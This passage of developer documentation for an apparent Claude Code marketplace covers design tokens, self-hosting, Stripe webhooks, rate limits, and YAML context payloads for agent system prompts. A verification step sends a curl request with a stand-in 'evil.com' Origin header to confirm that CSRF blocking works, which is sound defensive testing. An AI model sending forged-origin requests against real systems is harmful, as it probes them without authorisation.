`z-modal` | 40 | Modal dialogs | | `--z-index-toast` | `z-toast` | 50 | Toast notifications | | `--z-index-max` | `z-max` | 9999 | Emergency override only | ## Border radius Terminal aesthetic: barely-rounded rectangles. Base `--radius` is `0.375rem` (6px). | Token | Tailwind class | Computed value | |---|---|---| | `--radius-sm` | `rounded-sm` | 3.6px | | `--radius-md` | `rounded-md` | 4.8px | | `--radius-lg` | `rounded-lg` | 6px (base) | | `--radius-xl` | `rounded-xl` | 8.4px | | `--radius-2xl` | `rounded-2xl` | 10.8px | | `--radius-3xl` | `rounded-3xl` | 13.2px | | `--radius-4xl` | `rounded-4xl` | 15.6px | ## Component inventory ### Atoms (20 components) Small UI primitives. Single responsibility, no business logic. | Component | File | Purpose | |---|---|---| | AsciiText | `ascii-text.tsx` | ASCII art text rendering | | BreadcrumbNav | `breadcrumb-nav.tsx` | Navigation breadcrumbs | | ClaudeCodeLogo | `claude-code-logo.tsx` | Brand logo mark | | ClaudeMascot | `claude-mascot.tsx` | Static mascot illustration | | ClaudeMascotAnimated | `claude-mascot-animated.tsx` | Animated mascot | | LevelBadge | `level-badge.tsx` | User level indicator | | McsBadge | `mcs-badge.tsx` | MCS certification badge | | PriceTag | `price-tag.tsx` | Price display (free/paid) | | RankBadge | `rank-badge.tsx` | User rank display | | RoleBadge | `role-badge.tsx` | User role indicator | | StarRating | `star-rating.tsx` | 1-5 star display | | StatCounter | `stat-counter.tsx` | Numeric stat with label | | StatusDot | `status-dot.tsx` | Status indicator dot | | ThemeProvider | `theme-provider.tsx` | Theme context wrapper | | ThemeSwitcher | `theme-switcher.tsx` | Dark/light/black toggle | | VaultBadge | `vault-badge.tsx` | Branded badge component | | VaultLogo | `vault-logo.tsx` | Full logo with wordmark | | VaultTag | `vault-tag.tsx` | Category/tag pill | | VerifyEmailBanner | `verify-email-banner.tsx` | Email verification prompt | | XpBar | `xp-bar.tsx` | XP progress bar | ### Molecules (12 components) Composed from atoms. Handle local interaction state. | Component | File | Purpose | |---|---|---| | AuthModal | `auth-modal.tsx` | Login/register modal | | CategoryFilter | `category-filter.tsx` | Category selection bar | | MarkdownRenderer | `markdown-renderer.tsx` | Markdown to HTML | | MobileProductList | `mobile-product-list.tsx` | Mobile product listing | | NavBar | `nav-bar.tsx` | Main navigation bar | | ProductCard | `product-card.tsx` | Product preview card | | ReportDialog | `report-dialog.tsx` | Content report form | | ReviewAggregate | `review-aggregate.tsx` | Rating summary display | | ReviewForm | `review-form.tsx` | Write a review | | ReviewList | `review-list.tsx` | Review listing | | SearchBar | `search-bar.tsx` | Search input with filters | | UserCard | `user-card.tsx` | User preview card | ### Organisms (12 components) Complex sections. May fetch data or manage significant state. | Component | File | Purpose | |---|---|---| | AskSellerDialog | `ask-seller-dialog.tsx` | Buyer-seller messaging | | ExploreClient | `explore-client.tsx` | Explore page client shell | | HeroSection | `hero-section.tsx` | Landing page hero | | MessagesPanel | `messages-panel.tsx` | Conversation message list | | ProductActions | `product-actions.tsx` | Buy/download/like bar | | ProductContent | `product-content.tsx` | Product page body | | ProductGrid | `product-grid.tsx` | Grid layout for products | | ProductTable | `product-table.tsx` | Table layout for products | | ProfileClient | `profile-client.tsx` | Profile page client shell | | ProfileHeader | `profile-header.tsx` | User profile header | | PurchasesList | `purchases-list.tsx` | User purchase history | | RelatedProducts | `related-products.tsx` | Related product suggestions | ### UI (shadcn/ui) The `components/ui/` directory contains unmodified shadcn/ui components (base-nova theme). These are never edited directly. ## Token-only policy ### What is prohibited in component code | Pattern | Example | Why | |---|---|---| | Inline colors | `text-[#d97757]`, `bg-[oklch(...)]` | Use semantic tokens (`text-primary`) | | Inline font-size | `text-[14px]`, `text-[0.875rem]` | Use scale classes (`text-sm`) | | Inline spacing | `p-[13px]`, `m-[7px]` | Use 4px grid (`p-3`, `m-2`) | | Inline shadows | `shadow-[0_0_8px_...]` | Use glow classes (`.glow-box`) | | Inline z-index | `z-[100]` | Use z-scale (`z-modal`) | | Inline border-radius | `rounded-[8px]` | Use radius tokens (`rounded-lg`) | | Manual text-system | `text-micro uppercase tracking-wider` | Use `text-system` utility | ### What is permitted - All Tailwind built-in classes (`text-xs`, `p-4`, `bg-primary`, `rounded-lg`) - Custom `@utility` classes (`text-nano`, `text-micro`, `text-mini`, `text-system`) - Theme tokens (`text-muted-foreground`, `bg-card`, `border-border`, `text-primary`) - Glow classes (`.glow-box`, `.glow-primary`, `.glow-green`) - `animate-blink` for terminal cursor ### Exceptions (require inline comment) - SVG `width`/`height` attributes (dimensional, not styling) - Animation `@keyframes` internal to `globals.css` - shadcn/ui components in `components/ui/` (never edited) ### Where tokens are defined All design tokens live in `src/app/globals.css` inside the `@theme inline` block. Theme variants (`.dark`, `.light`, `.black`) override CSS custom properties to swap palettes without changing component code. --- # Self-Hosting Deploy your own MyClaude marketplace instance. This guide covers every service dependency, environment variable, and verification step. ## Architecture overview ``` Browser --> Next.js 16 (Vercel / Node.js) | | | v v v Firebase Stripe Cloudflare R2 (Auth + Connect (product files) Firestore + (payments) Storage) ``` | Service | Role | |---------|------| | **Firebase Auth** | User authentication (email/password, Google OAuth) | | **Cloud Firestore** | Primary database (products, users, orders, reviews) | | **Firebase Storage** | Avatar and thumbnail uploads | | **Stripe Connect Express** | Payment processing, seller payouts, 8% platform fee | | **Cloudflare R2** | Product file storage (Skills, Agents, etc.) with presigned URLs | | **Vercel** (recommended) or Node.js host | Application server | ## Prerequisites Before you begin, create accounts and projects for: 1. **Firebase** -- Create a project at [console.firebase.google.com](https://console.firebase.google.com) 2. **Stripe** -- Create an account at [dashboard.stripe.com](https://dashboard.stripe.com) with Connect enabled 3. **Cloudflare** -- Create an R2 bucket at [dash.cloudflare.com](https://dash.cloudflare.com) 4. **Vercel** (recommended) or a server running Node.js 20+ ## Environment variables Your deployment requires 17 environment variables. Never commit actual values to version control. ### Firebase Client (exposed to browser) | Variable | Description | |----------|-------------| | `NEXT_PUBLIC_FIREBASE_API_KEY` | Firebase Web API key from project settings | | `NEXT_PUBLIC_FIREBASE_AUTH_DOMAIN` | `{project-id}.firebaseapp.com` | | `NEXT_PUBLIC_FIREBASE_PROJECT_ID` | Firebase project ID | | `NEXT_PUBLIC_FIREBASE_STORAGE_BUCKET` | `{project-id}.firebasestorage.app` | | `NEXT_PUBLIC_FIREBASE_MESSAGING_SENDER_ID` | Sender ID from project settings | | `NEXT_PUBLIC_FIREBASE_APP_ID` | App ID from project settings | | `NEXT_PUBLIC_FIREBASE_MEASUREMENT_ID` | Google Analytics measurement ID (optional) | ### Firebase Admin (server-only) | Variable | Description | |----------|-------------| | `FIREBASE_SERVICE_ACCOUNT_KEY` | Full JSON string of the service account key downloaded from Firebase Console > Project Settings > Service Accounts. Must be a single-line JSON string. | ### Stripe | Variable | Description | |----------|-------------| | `STRIPE_SECRET_KEY` | Stripe secret key. Use `sk_test_*` for testing, `sk_live_*` for production. | | `STRIPE_WEBHOOK_SECRET` | Webhook signing secret from Stripe Dashboard > Webhooks | | `NEXT_PUBLIC_STRIPE_PUBLISHABLE_KEY` | Stripe publishable key (exposed to browser) | ### Cloudflare R2 | Variable | Description | |----------|-------------| | `CLOUDFLARE_ACCOUNT_ID` | Your Cloudflare account ID (found in the dashboard URL) | | `R2_ACCESS_KEY_ID` | R2 API token access key | | `R2_SECRET_ACCESS_KEY` | R2 API token secret key | | `R2_BUCKET_NAME` | Name of the R2 bucket for product files | ### Platform | Variable | Description | |----------|-------------| | `NEXT_PUBLIC_PLATFORM_FEE_PERCENT` | Platform fee percentage (default: `8`) | | `NEXT_PUBLIC_APP_URL` | Your deployment URL (e.g., `https://marketplace.example.com`). Used for CSRF origin validation and Stripe redirect URLs. | ## Firebase setup ### 1. Enable authentication In Firebase Console > Authentication > Sign-in method, enable: - Email/Password - Google (recommended) ### 2. Create Firestore database Create a Cloud Firestore database in production mode. Deploy the security rules: ```bash $ npx firebase deploy --only firestore:rules ``` The rules file (`firestore.rules`) ships with the repository. It enforces: - Authenticated reads for most collections - Server-only writes for `orders` (webhook creates these) - Owner-only writes for user profiles ### 3. Deploy storage rules ```bash $ npx firebase deploy --only storage ``` The storage rules (`storage.rules`) enforce: - `allow read: if false` for product files (signed URLs bypass rules) - Authenticated uploads for avatars and thumbnails with size limits ### 4. Create Firestore indexes Composite indexes are required for queries. Deploy them: ```bash $ npx firebase deploy --only firestore:indexes ``` ## Stripe Connect setup ### 1. Enable Connect In Stripe Dashboard > Connect > Settings: - Account type: **Express** - Platform profile: Marketplace ### 2. Configure webhook Create a webhook endpoint pointing to your deployment: ``` https://your-domain.com/api/stripe/webhooks ``` Subscribe to these events: - `checkout.session.completed` -- creates orders after payment - `charge.refunded` -- processes refunds, updates stats - `account.updated` -- tracks seller onboarding status Copy the webhook signing secret to `STRIPE_WEBHOOK_SECRET`. ### 3. Platform fee The platform fee is hardcoded at 8% on the server side (in the webhook handler). The `NEXT_PUBLIC_PLATFORM_FEE_PERCENT` variable controls the display value shown to users. To change the actual fee, modify the `PLATFORM_FEE_PERCENT` constant in `src/app/api/stripe/webhooks/route.ts`. ## R2 storage setup ### 1. Create a bucket In Cloudflare Dashboard > R2 > Create bucket. Name it (e.g., `myclaude-marketplace`). ### 2. Create API token In R2 > Manage R2 API Tokens > Create API token: - Permissions: Object Read & Write - Scope: Apply to the specific bucket Copy the Access Key ID and Secret Access Key. ### 3. Configure CORS (if needed) If your deployment domain differs from the R2 endpoint, add a CORS policy to the bucket: ```json [ { "AllowedOrigins": ["https://your-domain.com"], "AllowedMethods": ["GET", "PUT"], "AllowedHeaders": ["*"], "MaxAgeSeconds": 3600 } ] ``` ## Deploying ### Option A: Vercel (recommended) ```bash $ npm install -g vercel $ vercel --prod ``` Add all 17 environment variables in Vercel Dashboard > Settings > Environment Variables. The `next.config.ts` and build scripts are pre-configured for Vercel. Key Vercel settings: - Framework Preset: Next.js - Node.js Version: 20.x - Build Command: `npm run build` (runs prebuild script automatically) - Output Directory: `.next` ### Option B: Self-hosted Node.js ```bash $ npm install $ npm run build $ npm start ``` The server starts on port 3000 by default. Use a reverse proxy (nginx, Caddy) for TLS termination. Ensure all 17 environment variables are set in the process environment. Minimum server requirements: - Node.js 20+ - 1 GB RAM - Outbound HTTPS access to Firebase, Stripe, and Cloudflare APIs ## Post-deploy verification Run through this checklist after your first deployment. | Step | How to verify | Expected result | |------|---------------|-----------------| | Health check | `GET /api/health` | `{ "status": "ok" }` | | Auth | Register a new account | User appears in Firebase Console > Authentication | | Product creation | Publish a free product | Product visible on `/explore` | | File upload | Upload a `.zip` to R2 via the publish flow | File stored in your R2 bucket | | Stripe Connect | Click "Connect Stripe" in seller settings | Redirected to Stripe onboarding | | Checkout | Purchase a paid product (test mode) | Order created in Firestore `orders` collection | | Download | Download a purchased product | Signed URL generated, file downloads | | Webhook | Check Stripe Dashboard > Webhooks > Recent events | Events show 200 responses | | CSRF | `curl -X POST /api/products/like -H "Origin: https://evil.com"` | `403 Forbidden` | ## Related pages - [Contributing](/docs/developers/contributing) -- Local development setup - [Security Model](/docs/security/model) -- Security architecture details - [Webhooks & Integration](/docs/developers/webhooks) -- Webhook events and rate limits - [API Overview](/docs/api/overview) -- Endpoint groups and authentication --- # Webhooks & Integration Reference for Stripe webhook events, integration points, and rate limits across all API routes. ## Stripe webhooks MyClaude listens for Stripe events at a single endpoint: ``` POST /api/stripe/webhooks ``` This endpoint is exempt from CSRF origin checks and Bearer token auth. It authenticates exclusively via Stripe webhook signature verification. ### Handled events | Event | Action | |-------|--------| | `checkout.session.completed` | Creates order, updates product stats, credits XP to buyer and seller | | `charge.refunded` | Marks order as refunded, reverses seller revenue and stats, notifies seller | | `account.updated` | Updates seller `stripeOnboarded` status when `charges_enabled` becomes true | All other event types are acknowledged with `200` and silently ignored. ## Webhook security ### Signature verification Every incoming webhook is verified using `stripe.webhooks.constructEvent()` with the `STRIPE_WEBHOOK_SECRET`. Requests with missing or invalid signatures receive `400` and are not processed. ``` Request arrives | v Extract stripe-signature header | v constructEvent(body, signature, secret) |-- Invalid --> 400 (no retry) |-- Valid --> Process event ``` ### Idempotency Order creation uses the **Stripe session ID as the Firestore document ID**. This guarantees idempotency: - First delivery: transaction creates the order document - Retry delivery: transaction reads the existing document, detects duplicate, skips creation - No duplicate orders, no duplicate stat increments The check runs inside a Firestore transaction, so concurrent webhook retries are also safe. ### Atomic order creation The `checkout.session.completed` handler executes a single Firestore transaction that atomically: 1. Creates the `orders/{sessionId}` document 2. Increments `products/{id}.stats.purchaseCount` 3. Increments `users/{sellerId}.stats.totalRevenue` and `stats.totalSales`, adds 50 XP 4. Increments `users/{buyerId}.stats.productsBought`, adds 10 XP If any step fails, the entire transaction rolls back. Stripe receives `503`, which triggers automatic retry with exponential backoff. ### Price verification The webhook handler re-reads the product price from Firestore and cross-checks against `session.amount_total`. If a price change occurred between checkout creation and webhook delivery, the discrepancy is logged but the order is still created using Stripe's authoritative amount (what was actually charged). Platform fee is recalculated server-side at 8% of the actual charged amount -- never from client metadata. ### Refund handling The `charge.refunded` handler: 1. Looks up the order by `stripePaymentIntentId` 2. Runs an atomic transaction: sets `status: "refunded"`, decrements seller revenue and sales count, decrements buyer purchase count 3. Creates a notification in the seller's `notifications` subcollection (fire-and-forget, outside transaction) Already-refunded orders are skipped (idempotent). ## Integration points ### CLI (`myclaude`) The `myclaude` CLI communicates with dedicated API routes optimized for terminal output. | CLI command | API route | Auth | |-------------|-----------|------| | `myclaude search` | `GET /api/cli/products/search` | None | | `myclaude publish` | `POST /api/cli/products/create` | Required | | `myclaude whoami` | `GET /api/cli/auth/profile` | Required | All CLI commands support a `--json` flag for machine-readable output, suitable for piping into `jq` or downstream scripts. ### MCP server MyClaude exposes tools via Model Context Protocol for agent integration. Agents can search products, read metadata, and trigger installations through MCP tool calls. See the [MCP Tool Schemas](/docs/agents/mcp-tool-schemas) reference for the full tool catalog. ### Docs A-Surface Requests to `/docs.md` or `/docs/{slug}.md` are rewritten to return raw Markdown content from the documentation system. This enables AI agents to fetch docs context without parsing HTML. ## Rate limits All routes are rate-limited per IP address within a 60-second window. Two strategies exist: | Strategy | On limit exceeded | On limiter failure | |----------|-------------------|--------------------| | **Standard** | 429 | Fail-open (allows request) | | **Strict** | 429 | Fail-closed (503) | ### Complete rate limit table | Route | Method | Limit | Strategy | Auth | |-------|--------|-------|----------|------| | `/stripe/checkout` | POST | 10/min | Strict | Required | | `/stripe/connect` | POST | 5/min | Strict | Required | | `/stripe/webhooks` | POST | -- | -- | Stripe signature | | `/stripe/callback` | GET | -- | -- | Redirect | | `/products/download` | POST | 30/min | Strict | Required | | `/products/upload` | POST | 10/min | Strict | Required | | `/products/scan` | POST | 10/min | Strict | Required | | `/products/like` | POST | 30/min | Strict | Required | | `/products/reviews` | GET | 30/min | Standard | Optional | | `/products/reviews` | POST | 5/min | Strict | Required | | `/products/self-approve` | POST | 20/min | Strict | Required | | `/users/update-profile` | POST | 5/min | Strict | Required | | `/users/follow` | POST | 30/min | Strict | Required | | `/users/delete-account` | DELETE | 1/min | Strict | Required | | `/reports` | POST | 10/min | Strict | Required | | `/messages` | GET | 60/min | Standard | Required | | `/messages` | POST | 20/min | Strict | Required | | `/messages/{id}` | GET | 60/min | Standard | Required | | `/admin/products/{id}/approve` | POST | 10/min | Strict | Admin | | `/admin/products/{id}/remove` | POST | 10/min | Strict | Admin | | `/admin/reports` | GET | 30/min | Standard | Admin | | `/admin/reports/{id}/resolve` | POST | 10/min | Strict | Admin | | `/admin/users/{id}/ban` | POST | 5/min | Strict | Admin | | `/cli/products/search` | GET | 30/min | Standard | None | | `/cli/auth/profile` | GET | 30/min | Standard | Required | | `/cli/products/create` | POST | 5/min | Strict | Required | ### Rate limit response When a rate limit is exceeded, the API returns: ```http HTTP/1.1 429 Too Many Requests Retry-After: 42 { "error": "Too many requests" } ``` The `Retry-After` header indicates seconds until the window resets. ## Error codes All API errors follow a consistent JSON format: ```json { "error": "Human-readable error message" } ``` | Status | Meaning | Common causes | |--------|---------|---------------| | `400` | Bad Request | Missing parameters, invalid metadata, business rule violation | | `401` | Unauthorized | Missing or expired Bearer token | | `403` | Forbidden | Insufficient permissions, banned user, CSRF origin mismatch | | `404` | Not Found | Resource does not exist or is unpublished | | `409` | Conflict | Duplicate purchase, duplicate review, username taken | | `429` | Too Many Requests | Rate limit exceeded | | `500` | Internal Server Error | Unexpected failure | | `503` | Service Unavailable | Dependency down, or strict rate limiter failure | For the full error taxonomy, see `/specs/error-codes.yaml` in the repository. ## Related pages - [API Overview](/docs/api/overview) -- Base URL, auth model, endpoint groups - [Payments API](/docs/api/payments) -- Checkout and Connect endpoint details - [Security Model](/docs/security/model) -- Architecture-level security controls - [MCP Tool Schemas](/docs/agents/mcp-tool-schemas) -- Agent integration reference - [Self-Hosting](/docs/developers/self-hosting) -- Deployment and webhook configuration --- # Agent-to-Agent CONDUIT CONDUIT is the wiring protocol that moves products from creation to consumption across three systems: Creator Engine, CLI, and Marketplace API. For agents, CONDUIT is not just a publishing pipeline — it is the discovery and installation backbone that makes agent-to-agent workflows possible. ## What is CONDUIT? CONDUIT defines how a product travels from a creator's workspace to an agent's context window. The protocol spans 28 wiring points (WP-1 through WP-28) across three boundaries. ``` Creator Engine CLI Marketplace ───────────── ─── ─────────── Scaffold product → Read vault.yaml → Validate payload Build content → Collect + scan → Persist to Firestore Validate MCS → Pack + upload → Index for search Generate manifest → Call API → Serve to agents ↓ Agent discovers via search/MCP Agent reads context payload Agent installs via CLI Agent consumes product files ``` The key insight: CONDUIT was designed so that every boundary can be crossed by an agent without human intervention. The CLI accepts `--json` on all commands. The API returns structured responses. The manifest (`vault.yaml`) is machine-readable YAML. For the full publishing protocol from a creator's perspective, see [CONDUIT Publishing Protocol](/docs/creators/conduit-protocol). ## The 5-level agent stack Agents consume MyClaude content through five levels, ordered from highest abstraction to raw content. Each level serves a different context budget and task complexity. | Level | Name | Tokens | What it contains | When to use | |-------|------|--------|------------------|-------------| | L5 | Behavioral directives | ~100 | Rules for how agents talk about MyClaude | Quick orientation, system prompt preamble | | L4 | Context payloads | ~500 each | Pre-built YAML with platform facts, workflows, terminology | Bootstrapping agent knowledge in constrained contexts | | L3 | Navigable index | ~2,000 | `docs-index.json` with page summaries, audience tags, diataxis type | Selective page discovery without scanning everything | | L2 | Machine-readable contracts | 800-3,000 | OpenAPI spec, JSON Schema for vault.yaml, MCP tool definitions | API integration, manifest validation, tool invocation | | L1 | Content layer | 500-30,000 | Full documentation as Markdown via `.md` suffix or `llms-full.txt` | Deep Q&A, detailed explanations, edge cases | An agent that needs to answer "what is MyClaude?" reads L5. An agent that needs to install a product for a user reads L4 (buyer context payload) and L2 (CLI commands spec). An agent building a product reads L1 (the full publishing guide). For details on each level's entry points, see [Agent Integration Overview](/docs/agents/overview). ## How agents discover and install products Agent-driven discovery follows a three-step pattern: search, evaluate, install. Every step is available as both a CLI command (with `--json` output) and a REST API call. ```bash # Step 1: Search myclaude search "code review" --category skills --json # Returns: array of {name, slug, category, price, downloads, mcsLevel} # Step 2: Evaluate myclaude info @securitydev/code-review-skill --json # Returns: full product metadata including version, license, tags # Step 3: Install myclaude install @securitydev/code-review-skill --json # Returns: {installed: true, path: ".claude/skills/code-review-skill", version: "1.2.0"} ``` The `--json` flag is the agent's interface. Every CLI command outputs structured JSON when this flag is present, making output parseable without regex or string matching. ## Agent consumption patterns ### Context payloads Context payloads are ~500-token YAML files designed for system prompt injection. An agent loads a payload and gains working knowledge of MyClaude's categories, CLI commands, pricing, and terminology — without consuming 30,000 tokens of full documentation. Three payload types exist: `marketplace.yaml` (general platform), `creator.yaml` (publishing workflow), `buyer.yaml` (discovery and installation). Served from `/specs/context/`. See [Context Payloads](/docs/agents/context-payloads) for the full specification and examples. ### MCP tool schemas MyClaude exposes marketplace operations as MCP tools defined at `/specs/mcp-tools.json`. An MCP client (such as Claude Code) discovers these tools automatically and can invoke `myclaude_search`, `myclaude_install`, `myclaude_info`, and others without constructing HTTP requests. Products can also declare their own MCP tools in `vault.yaml` under the `config.mcp_tools` field. When installed, these tools become available in Claude Code's tool inventory. See [MCP Tool Schemas](/docs/agents/mcp-tool-schemas) for the complete tool definitions. ### Structured CLI output Every `myclaude` CLI command supports `--json` for machine consumption. This means an agent orchestrating a workflow can parse install results, search responses, and validation output programmatically. ## Building agent-aware products Products that agents can discover and reason about effectively include two fields in `vault.yaml`: ```yaml # vault.yaml — agent-aware fields name: code-review-skill version: 1.2.0 category: skills description: "Automated code review with security focus." agent_summary: "Reviews code for security vulns. Input: file path. Output: findings list." agent_spec: inputs: [file_path, focus_area] outputs: [findings, severity, suggestions] side_effects: none context_budget: 800 ``` | Field | Max length | Purpose | |-------|-----------|---------| | `agent_summary` | 100 chars | One-line description optimized for agent tool selection and search ranking | | `agent_spec` | object | Structured declaration of inputs, outputs, side effects, and context cost | The `agent_summary` appears in search results and `docs-index.json`. Agents use it to decide relevance without fetching the full product page. Write it as an imperative statement of what the product does, not a marketing pitch. The `agent_spec` helps orchestrating agents decide whether a product fits their workflow constraints. A product that declares `side_effects: none` and `context_budget: 800` tells the agent it is safe to invoke in a pipeline and will not blow the context window. ## MCP integration MyClaude operates as an MCP server for Claude Code. This means Claude Code can interact with the marketplace — searching, installing, validating — through native tool calls rather than shell commands. ``` Claude Code session ├── User asks: "Find me a code review skill" ├── Agent selects: myclaude_search tool ├── MCP runtime: calls MyClaude API ├── Result: [{name: "code-review-skill", ...}] ├── Agent selects: myclaude_install tool ├── MCP runtime: installs via CLI └── Product files now in .claude/skills/ ``` The MCP layer is an ergonomic bridge over the REST API. Agents that already use the API directly do not need it. The benefit is integration with Claude Code's native tool-calling interface — no HTTP construction, no auth header management. ## Future: agent-to-agent marketplace transactions The current CONDUIT pipeline assumes a human creator publishes and a human or agent buyer consumes. The next evolution is agent-to-agent transactions: an agent that identifies a capability gap searches the marketplace, evaluates options, purchases the best fit, and installs it — all within a single session. This requires three capabilities that CONDUIT already supports in principle: 1. **Programmatic discovery** — `myclaude_search` MCP tool or `--json` CLI output. 2. **Automated evaluation** — `agent_summary` and `agent_spec` provide machine-readable quality signals. 3. **Unattended installation** — `myclaude install` with `--json` returns structured success/failure. The missing piece is programmatic purchasing for paid products. Today, `myclaude install` for paid products opens a Stripe Checkout in the browser. Agent-to-agent purchasing will require a headless checkout flow — a planned extension to the CONDUIT protocol. ## Related pages - [Agent Integration Overview](/docs/agents/overview) — entry points and the PRISM architecture - [MCP Tool Schemas](/docs/agents/mcp-tool-schemas) — MCP tool definitions and consumption patterns - [Context Payloads](/docs/agents/context-payloads) — pre-packaged YAML for bootstrapping agent knowledge - [CONDUIT Publishing Protocol](/docs/creators/conduit-protocol) — the creator-facing pipeline reference --- # Context Payloads Context payloads are pre-packaged YAML files (~500 tokens each) designed to give any AI agent instant working knowledge of MyClaude. Instead of loading 30,000 tokens of full documentation, an agent injects a single payload and gains enough context to assist users with marketplace tasks immediately. ## What context payloads solve AI agents operate under context window constraints. Loading full documentation is the most accurate approach but consumes significant budget — often more than the task requires. At the other extreme, a single-paragraph description leaves the agent without the specifics needed to give correct guidance. Context payloads sit between these extremes. Each payload is a structured YAML document of approximately 500 tokens that encodes the essential facts, terminology, and decision rules for a specific domain within MyClaude. An agent consuming a payload can: - Use correct product terminology (the 9 categories, vault.yaml, MCS). - Recommend the right CLI commands for a given task. - Understand pricing, authentication, and installation mechanics. - Avoid common mistakes (e.g., suggesting manual file downloads instead of CLI install). Payloads are not a substitute for full documentation. They are a fast-start mechanism. When an agent encounters a question that exceeds the payload's scope, it should fetch the relevant documentation page via [.md suffix routing](/docs/agents/overview) or consult the [docs-index.json](/specs/docs-index.json) for targeted retrieval. ## The three payload types | Payload | File | Audience | Purpose | |---------|------|----------|---------| | Marketplace context | `marketplace.yaml` | General-purpose agents | Platform overview, categories, key URLs, terminology | | Creator context | `creator.yaml` | Agents assisting product creators | Publishing workflow, vault.yaml fields, monetization, CLI commands | | Buyer context | `buyer.yaml` | Agents assisting product buyers | Discovery, installation, purchasing, download mechanics | All payloads will be served from `/specs/context/` when the spec ships. The examples below define the canonical format. ## Marketplace context payload Use this payload when an agent needs general MyClaude fluency — answering questions about the platform, recommending products, or explaining how the ecosystem works. ```yaml # MyClaude Marketplace Context Payload # Inject into system prompt or RAG context # ~500 tokens | Updated: 2026-03-25 platform: name: MyClaude url: https://myclaude.sh tagline: "The universal marketplace for the Claude Code ecosystem." cli: "@myclaude-cli/cli" cli_command: myclaude categories: - skills # Callable prompt routines in .claude/skills/ - squads # Multi-agent teams with coordinated workflows - agents # Single-purpose AI entities with specialized knowledge - workflows # Multi-step automation pipelines - design-systems # Token sets, component libraries, design rules - prompts # Reusable system prompts and templates - claude-md # Project configuration files for Claude Code - applications # Full applications built for/with Claude Code pricing: model: "Creator sets price. Free or paid." creator_share: 92% platform_fee: 8% processor: Stripe Connect Express auth: method: "Firebase Auth (JWT Bearer token)" public_access: "Search, browse, read docs — no auth required" auth_required: "Publish, purchase, download" quality: certification: MCS (MyClaude Certified Standard) scanning: "Automated security + content scan on every publish" manifest: vault.yaml key_urls: docs: https://myclaude.sh/docs api_spec: https://myclaude.sh/specs/openapi.yaml cli_spec: https://myclaude.sh/specs/cli-commands.yaml schema: https://myclaude.sh/specs/vault-yaml.schema.json llms_txt: https://myclaude.sh/llms.txt behavioral_rules: - "Use 'MyClaude' (not 'VAULT' or 'vault marketplace') when naming the platform." - "Recommend CLI install: myclaude install @creator/product." - "Never suggest manual file downloads when CLI is available." - "Recommend MCS-certified products when multiple options exist." - "Default to vault.yaml v2 format for publishing." ``` ## Creator context payload Use this payload when an agent is helping a user create, package, or publish a product on MyClaude. It encodes the publishing workflow, required manifest fields, and creator-specific CLI commands. ```yaml # MyClaude Creator Context Payload # Inject when assisting with product creation/publishing # ~500 tokens | Updated: 2026-03-25 workflow: steps: 1_scaffold: "myclaude init --category " 2_develop: "Write product files (SKILL.md, AGENT.md, etc.)" 3_configure: "Edit vault.yaml with metadata and pricing" 4_scan: "myclaude scan — check for security issues" 5_publish: "myclaude publish — upload to marketplace" 6_verify: "Check listing at myclaude.sh/p/" manifest: file: vault.yaml required_fields: - name # lowercase kebab-case, 2-64 chars - version # semver: major.minor.patch - category # one of 9 categories - description # max 200 chars, shown in search - author # MyClaude username - license # SPDX identifier (default: MIT) - entry # main file path (SKILL.md, AGENT.md, etc.) optional_fields: - price # USD, 0 = free (default: 0) - tags # up to 10 searchable tags - install_path # custom install dir relative to .claude/ - min_cli_version # minimum CLI version (semver) - config # category-specific settings (MCP tools, etc.) monetization: stripe_setup: "myclaude login → Dashboard → Settings → Connect Stripe" payout_split: "92% creator / 8% platform" minimum_price: "$0 (free) or any positive amount" cli_commands: init: "myclaude init --category --template " scan: "myclaude scan []" publish: "myclaude publish [--dry-run]" login: "myclaude login" entry_files_by_category: skills: SKILL.md agents: AGENT.md squads: SQUAD.md workflows: WORKFLOW.md design-systems: DESIGN-SYSTEM.md prompts: PROMPT.md claude-md: CLAUDE.md applications: README.md schema_url: https://myclaude.sh/specs/vault-yaml.schema.json publishing_guide: https://myclaude.sh/docs/creators/publishing ``` ## Buyer context payload Use this payload when an agent is helping a user discover, evaluate, install, or purchase products from MyClaude. ```yaml # MyClaude Buyer Context Payload # Inject when assisting with product discovery/installation # ~500 tokens | Updated: 2026-03-25 discovery: cli_search: "myclaude search [--category ] [--sort ]" web_browse: "https://myclaude.sh/explore" sort_options: [relevance, downloads, newest, price] categories: [skills, squads, agents, workflows, design-systems, prompts, claude-md, applications, systems] installation: install: "myclaude install @creator/product [--version ]" install_global: "myclaude install @creator/product --global" list_installed: "myclaude list [--json]" update_one: "myclaude update " update_all: "myclaude update --all" uninstall: "myclaude uninstall " install_locations: skills: ".claude/skills/" squads: ".claude/squads/" agents: ".claude/agents/" workflows: ".claude/workflows/" design-systems: ".claude/design-systems/" prompts: ".claude/prompts/" claude-md: ".claude/" applications: ".claude/applications/" purchasing: free_products: "Install directly with myclaude install." paid_products: "myclaude install triggers Stripe Checkout in browser." flow: "Stripe Checkout → payment → webhook creates order → download unlocked" download: "POST /api/products/download with auth token → signed URL (5min expiry)" evaluation: info_command: "myclaude info @creator/product [--json]" web_page: "https://myclaude.sh/p/" signals: - download_count # Higher = more community adoption - mcs_certified # Passed quality and security review - version_history # Active maintenance signal - creator_profile # Check at myclaude.sh/u/ auth: login: "myclaude login — opens browser OAuth flow" check: "myclaude whoami — verify current session" logout: "myclaude logout — clear local credentials" docs: https://myclaude.sh/docs/buyers/browsing ``` ## How agents use context payloads ### System prompt injection The most common pattern. The orchestrating system prepends the relevant payload to the agent's system prompt before the conversation begins. ``` System: You are a Claude Code assistant. The following context describes the MyClaude marketplace. {contents of marketplace.yaml} Use this context to answer user questions about MyClaude products. When the user's question exceeds this context, fetch the relevant documentation page from https://myclaude.sh/docs/{page}.md. ``` This approach costs ~500 tokens of context budget per payload — roughly 0.5% of a 100K context window. The tradeoff is strong: 500 tokens buys fluency across all 9 product categories, correct CLI command syntax, and accurate pricing information. ### RAG context In retrieval-augmented generation pipelines, context payloads serve as high-priority retrieval chunks. Because they are structured YAML with clear field names, embedding models produce high-quality vectors that match a wide range of user queries about MyClaude. Index each payload as a single chunk. The YAML structure ensures that keyword and semantic matches both perform well. When a user query matches a payload, inject the entire payload — partial YAML is ambiguous and degrades agent performance. ### Multi-payload composition For agents that serve both creators and buyers, compose payloads by concatenating them. The total cost is approximately 1,000 tokens for two payloads — still well within budget for most context windows. ``` {contents of marketplace.yaml} --- {contents of creator.yaml} ``` Avoid loading all three payloads simultaneously unless the agent genuinely serves all three audiences. Irrelevant context degrades precision. ## When to use full docs vs context payloads | Scenario | Recommended approach | Why | |----------|---------------------|-----| | 